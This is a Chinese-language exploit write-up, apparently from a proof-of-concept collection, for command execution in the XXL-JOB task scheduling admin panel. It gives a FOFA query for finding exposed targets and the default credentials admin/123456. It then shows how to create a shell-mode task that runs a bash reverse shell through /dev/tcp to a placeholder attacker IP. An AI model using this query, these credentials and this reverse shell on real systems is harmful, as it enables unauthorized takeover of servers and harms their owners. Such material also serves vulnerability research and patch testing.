Awesome-POC/Web应用漏洞/XXL-JOB 任务调度中心 后台任意命令执行漏洞.md
2022-05-17 17:43:20 +08:00

58 lines
1005 B
Markdown

# XXL-JOB 任务调度中心 后台任意命令执行漏洞
## 漏洞描述
XXL-JOB 任务调度中心攻击者可以在后台可以通过写入shell命令任务调度获取服务器权限
## 漏洞影响
```
XXL-JOB
```
## FOFA
```
app="XXL-JOB" || title="任务调度中心"
```
## 漏洞复现
登录后台增加一个任务
- 默认口令 admin/123456
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101914314.png)
- 注意运行模式需要为 GLUE(shell)
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915543.png)
点击 GLUE IDE编辑脚本
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915236.png)
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915343.png)
执行探测出网,和任务调用是否可执行
反弹一个shell
```plain
#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1'
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915912.png)